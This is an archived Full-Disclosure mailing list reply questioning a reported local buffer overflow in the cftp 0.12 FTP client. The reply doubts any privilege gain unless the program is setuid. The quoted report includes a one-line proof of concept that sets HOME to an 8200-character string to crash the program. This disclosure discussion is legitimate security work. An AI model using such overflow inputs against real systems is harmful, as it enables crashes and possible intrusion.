[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability
- To: starcadi <starcadi@xxxxxxxxx>
- Subject: Re: [Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability
- From: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
- Date: Tue, 20 Mar 2007 17:23:10 +0300
Dear starcadi,
A very effective way for user to exploit himself. How can you elevate
your privileges this way? Is cftp suid?
--Tuesday, March 20, 2007, 12:52:13 AM, you wrote to
full-disclosure@xxxxxxxxxxxxxxxxx:
s> Description:
s> CFTP is Comfortable FTP, a full screen ftp client.
s> Proof of concept:
s> $ export HOME=`perl -e "print 'A'x8200"`
s> $ cftp
s> Segmentation fault
s> $
--
~/ZARAZA http://securityvulns.com/
Неприятности начнутся в восемь. (Твен)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/